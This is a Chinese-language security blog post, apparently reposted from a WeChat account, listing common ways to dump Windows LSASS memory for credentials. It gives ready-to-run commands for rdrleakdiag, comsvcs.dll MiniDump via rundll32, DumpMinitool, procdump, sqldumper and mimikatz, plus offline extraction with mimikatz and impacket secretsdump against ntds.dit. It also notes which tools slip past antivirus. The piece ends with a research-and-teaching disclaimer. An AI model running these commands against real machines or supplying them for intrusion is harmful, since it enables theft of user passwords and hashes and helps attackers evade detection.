Lsass常用抓取方法

admin
admin
admin
138635
文章
114
评论
2023年11月11日12:19:01评论99 views字数 2073阅读6分54秒阅读模式

Lsass介绍

本地安全认证子系统服务(Local Security Authority Subsystem Service,缩写 LSASS),是微软窗口操作系统的一个内部程序,负责执行Windows系统安全政策。它在用户登录时电脑单机或服务器时,验证用户身份,管理用户密码变更,并产生访问字符。它也会在窗口安全记录档中留下应有的记录

简单说就是Lsass.exe这个进程中会存储本地/域在当前机器登录过的用户信息,权限足够时我们可以导出其中存储的用户信息方便后续操作。


Task Manager

这个方式通杀大部分AV!Lsass常用抓取方法

需要权限:Administrator

Lsass常用抓取方法

Lsass常用抓取方法    

          

Rdrleakdiag

介绍:rdrleakdiag,主要用于windows资源泄露诊断。公开资料显示win7、8、10、server2012以上默认安装。

默认存放路径:

C:WindowsSystem32

需要权限:Administrator

Lsass常用抓取方法

使用win10pro测试,在powershell成功导出,cmd未成功。

rdrleakdiag.exe /p pid /o outpath /fullmemdmp /wait 1          rdrleakdiag.exe /p pid /o outpath /fullmemdmp /snap

执行后会生成 .hlk后缀临时文件,临时文件会自动删除。

Lsass常用抓取方法

Tips:shell等方式执行命令使要注意不要多次执行,机器容易卡住。    

          

Comsvcs

介绍:comsvcs.dll全称为COM+ Services DLL,它是Microsoft COM+服务的一个组件,提供了COM+运行时所需的核心服务和功能,包括对象池管理、事务处理、安全管理等。

默认存放路径:

C:windowssystem32comsvcs.dll

需要权限:SYSTEM

使用comsvcs Dump Lsass.exe时需要开启SeDebugPrivilege权限。管理员权限的cmd下默认支持SeDebugPrivilege权限,但是默认状态:Disabled。Powershell下默认状态:Enabled。

Lsass常用抓取方法

查看lsass.exe进程PID:

Lsass常用抓取方法    

调用comsvcs.dll导出函数MiniDump,导出Lsass。

基础用法:rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump 832 C:toolstmplsass.dmp full

Lsass常用抓取方法

Lsass常用抓取方法

          

DumpMinitool

介绍:Visual Studio 2022自带的工具。之前可以免杀dump,现在还能免杀部分AV。我的VS2022没找到这个工具,网上下的显示数字签名已经过期。

默认存放路径:

C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensions

需要权限:Administrator    

Lsass常用抓取方法

DumpMinitool.exe --file OutFileName --processId PID --dumpType Full

Lsass常用抓取方法

          

Procdump

介绍:ProcDump用于监视应用程序的CPU峰值并在峰值期间创建故障转储。然后管理员或软件开发人员可以使用故障转储来确定峰值的原因。ProcDump 支持监视挂起的窗口和未处理的异常,还可以根据系统性能计数器的值创建转储。带有微软签名所以自带一点点免杀效果,我的版本好像比较老,可以下个新的看看证书是否有效。    

Lsass常用抓取方法

需要权限:User

procdump64.exe -accepteula -ma lsass.exe lsass.dmp


Lsass常用抓取方法

类似的带签名的工具还有:SQLDumper、createdump    

目标有Microsoft SQL和Office服务时会自带SQLDumper

默认存放路径:

MSSQL:C:Program FilesMicrosoft SQL Server100SharedOffice:C:Program Files (x86)Microsoft OfficerootvfsProgramFilesX86Microsoft AnalysisAS OLEDB140SQLDumper.exe

用法:sqldumper.exe PID 0 0x0110

          

Mimikatz

这工具就直接上命令了,没啥好说的。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Lsass常用抓取方法

          

Hash文件解密

mimikaz解密

privilege::debug                                    #权限提升sekurlsa::minidump Lsass.dmp            #加载dmp文件    sekurlsa::logonPasswords full                  #提取解密


Lsass常用抓取方法


impacket解密

secretsdump.py -system /root/vssadmin/SYSTEM -ntds /root/vssadmin/ntds.dit LOCAL

原文始发于微信公众号(YongYe 安全实验室):Lsass常用抓取方法

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月11日12:19:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Lsass常用抓取方法https://cn-sec.com/archives/2196800.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息